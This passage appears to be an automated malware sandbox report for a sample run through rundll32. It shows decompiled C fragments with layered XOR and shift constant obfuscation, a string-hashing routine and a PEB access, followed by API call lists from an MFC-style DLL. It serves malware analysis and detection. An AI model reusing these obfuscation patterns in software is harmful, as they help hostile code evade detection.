				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E007BD25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E007B0AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E007A80E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}

0x007a8971
0x007a8974
0x007a8976
0x007a8979
0x007a897b
0x007a8980
0x007a8986
0x007a898a
0x007a8991
0x007a8998
0x007a89a5
0x007a89a6
0x007a89a9
0x007a89b0
0x007a89b7
0x007a89be
0x007a89c5
0x007a89cc
0x007a89d7
0x007a89da
0x007a89e1
0x007a89ed
0x007a89f0
0x007a89f7
0x007a8a02
0x007a8a05
0x007a8a0c
0x007a8a0f
0x007a8a16
0x007a8a21
0x007a8a28
0x007a8a2b
0x007a8a32
0x007a8a39
0x007a8a40
0x007a8a44
0x007a8a4b
0x007a8a58
0x007a8a5d
0x007a8a64
0x007a8a6b
0x007a8a72
0x007a8a79
0x007a8a7d
0x007a8a84
0x007a8a97
0x007a8a9c
0x007a8aa2
0x007a8aa7
0x007a8aa8
0x007a8aa9
0x007a8aab
0x007a8ab5
0x007a8abe

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
Instruction ID: a933805f27c6354241d8439a0b55fc19627478fe59b43e2e19fe54bec30a020c
Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
Instruction Fuzzy Hash: 4041CE75C0121AEBCF18DFE5C98A9EEBFB0FB44314F108199D525AA260D3B95B45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007BDBEA Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E007BDBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E007B20B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}

0x007bdbf1
0x007bdbf4
0x007bdbf6
0x007bdbf9
0x007bdbfc
0x007bdbfe
0x007bdc03
0x007bdc0a
0x007bdc10
0x007bdc17
0x007bdc1e
0x007bdc25
0x007bdc2c
0x007bdc33
0x007bdc3a
0x007bdc46
0x007bdc49
0x007bdc4c
0x007bdc50
0x007bdc57
0x007bdc5e
0x007bdc65
0x007bdc69
0x007bdc70
0x007bdc74
0x007bdc7e
0x007bdc82
0x007bdc87
0x007bdc95
0x007bdc98
0x007bdc9c
0x007bdca3
0x007bdcb0
0x007bdcb7
0x007bdcbb
0x007bdcc2
0x007bdcc6
0x007bdcd8
0x007bdcdb
0x007bdce0
0x007bdce3
0x007bdce6
0x007bdce7
0x007bdce8
0x007bdcee
0x007bdcf6

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
Instruction ID: 1618e56ab8462d3c5aa851232e28885527e8c42cce79cb60c9e4b62a75b7931e
Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
Instruction Fuzzy Hash: 79311171D02348EBDF06DFA8CA4A2DEBBB0EF44314F208099D501A7265D3B14B98EF40

Uniqueness

Uniqueness Score: -1.00%

Function 007A9011 Relevance: .1, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E007A9011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E007B5BFD(_v32, _v28, _v12, E007BDCF7(_v8, __ecx, _v36));
				_t80 =  *0x7c3df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E007AA8B0(_v16, _t74, _v36);
			}

0x007a9017
0x007a901b
0x007a9022
0x007a902f
0x007a9035
0x007a9038
0x007a903f
0x007a9043
0x007a904a
0x007a9051
0x007a9054
0x007a905b
0x007a9062
0x007a9066
0x007a906d
0x007a9074
0x007a9078
0x007a907f
0x007a9086
0x007a908a
0x007a9091
0x007a9098
0x007a909f
0x007a90a6
0x007a90aa
0x007a90b1
0x007a90bb
0x007a90c0
0x007a90c3
0x007a90ca
0x007a90d1
0x007a90d8
0x007a90df
0x007a90e6
0x007a90ed
0x007a90f0
0x007a9107
0x007a910c
0x007a9117
0x007a912b

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242e5d717e77d92b028dd4364f0b8a2ba73f707640c28366f88f27b8a1782a69
Instruction ID: b8aca858245aa90085d001b757ecfc7c2590c6f6f1378aaf26d613b9602ce4cf
Opcode Fuzzy Hash: 242e5d717e77d92b028dd4364f0b8a2ba73f707640c28366f88f27b8a1782a69
Instruction Fuzzy Hash: 2F31E171D0021DEBCF48DFA5D94A4EEBBB1FF44318F208198D421B6250D7B90A59DF90

Uniqueness

Uniqueness Score: -1.00%

Function 007A7FF2 Relevance: .1, Instructions: 54
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E007A7FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E007A1E22(_v28, _v24, _t73, E007A1DB9(_t67), _v20, _v16);
			}

0x007a7ff8
0x007a7ffc
0x007a8003
0x007a800a
0x007a8011
0x007a8018
0x007a801c
0x007a8023
0x007a802a
0x007a8031
0x007a8038
0x007a803c
0x007a8043
0x007a804a
0x007a8055
0x007a805b
0x007a805e
0x007a8061
0x007a8065
0x007a806c
0x007a8073
0x007a807a
0x007a8081
0x007a8088
0x007a808f
0x007a8096
0x007a809d
0x007a80a4
0x007a80ab
0x007a80af
0x007a80b6
0x007a80e2

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
Instruction ID: 9d1f2afa336fc92531a72e65a63e7f97185c1b7d379551659be47941328e0d84
Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
Instruction Fuzzy Hash: 0D21EFB2D0131EEBDB48DFE5D94A4EEFBB0BB11314F208189D511B2264C3B40B498F91

Uniqueness

Uniqueness Score: -1.00%

Function 007B4087 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B4087() {

				return  *[fs:0x30];
			}

0x007b408d

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10014DC7
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
GetVersion.KERNEL32 ref: 10014EC3
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
RegQueryValueExA.ADVAPI32 ref: 10014F0D
_sscanf.LIBCMT ref: 10014F2D
ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
ConvertDefaultLocale.KERNEL32(72CDFFF6), ref: 10014F68
RegCloseKey.ADVAPI32(?), ref: 10014F77
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
ConvertDefaultLocale.KERNEL32(72CDFFF6), ref: 10014FD9
_memset.LIBCMT ref: 10014FF3

Strings

kernel32.dll, xrefs: 10014DDA
GetUserDefaultUILanguage, xrefs: 10014DF0
Control Panel\Desktop\ResourceLocale, xrefs: 10014EDB
GetSystemDefaultUILanguage, xrefs: 10014E39
ntdll.dll, xrefs: 10014F82

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(Native), ref: 1002E138
RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5

Strings

OwnerLink, xrefs: 1002E13A
Object Descriptor, xrefs: 1002E16B
Rich Text Format, xrefs: 1002E193
Native, xrefs: 1002E131
FileName, xrefs: 1002E17F
RichEdit Text and Objects, xrefs: 1002E19D
FileNameW, xrefs: 1002E189
Link Source Descriptor, xrefs: 1002E175
Embedded Object, xrefs: 1002E14D
ObjectLink, xrefs: 1002E143
Embed Source, xrefs: 1002E157
Link Source, xrefs: 1002E161

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88

Uniqueness

Uniqueness Score: -1.00%

Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
__mtterm.LIBCMT ref: 100354A0

Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1

GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
__init_pointers.LIBCMT ref: 10035552
__encode_pointer.LIBCMT ref: 1003555D
__encode_pointer.LIBCMT ref: 1003556D
__encode_pointer.LIBCMT ref: 1003557D
__encode_pointer.LIBCMT ref: 1003558D
__decode_pointer.LIBCMT ref: 100355AE
__calloc_crt.LIBCMT ref: 100355C7
__decode_pointer.LIBCMT ref: 100355E1
GetCurrentThreadId.KERNEL32 ref: 100355F7

Strings

FlsGetValue, xrefs: 100354B8
FlsFree, xrefs: 100354D2
FlsSetValue, xrefs: 100354C5
FlsAlloc, xrefs: 100354B0
KERNEL32.DLL, xrefs: 1003548F

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4287529916-3819984048
Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 1001C91F

Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D

CallNextHookEx.USER32 ref: 1001C963

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
SetWindowLongA.USER32 ref: 1001CA26
_memset.LIBCMT ref: 1001CA70
GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
SetWindowLongA.USER32 ref: 1001CB28
CallNextHookEx.USER32 ref: 1001CB40
UnhookWindowsHookEx.USER32 ref: 1001CB54

Strings

#32768, xrefs: 1001CA82, 1001CA87, 1001CAD1
ime, xrefs: 1001C9DA
AfxOldWndProc423, xrefs: 1001CAF8, 1001CAFD, 1001CB08, 1001CB10, 1001CB19

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 867647115-4034971020
Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1002DB50
_memset.LIBCMT ref: 1002DB78
lstrlenA.KERNEL32(?), ref: 1002DB88
_memset.LIBCMT ref: 1002DBF2
_memset.LIBCMT ref: 1002DE08
VariantClear.OLEAUT32(?), ref: 1002DE67
VariantClear.OLEAUT32(?), ref: 1002DE8F
SysStringLen.OLEAUT32(?), ref: 1002DEE9
SysFreeString.OLEAUT32(?), ref: 1002DF09
SysStringLen.OLEAUT32(?), ref: 1002DF0E
SysFreeString.OLEAUT32(?), ref: 1002DF22
SysStringLen.OLEAUT32(?), ref: 1002DF27
SysFreeString.OLEAUT32(?), ref: 1002DF3B
__CxxThrowException@8.LIBCMT ref: 1002DF55
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1002DF73
VariantClear.OLEAUT32(?), ref: 1002DF83

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
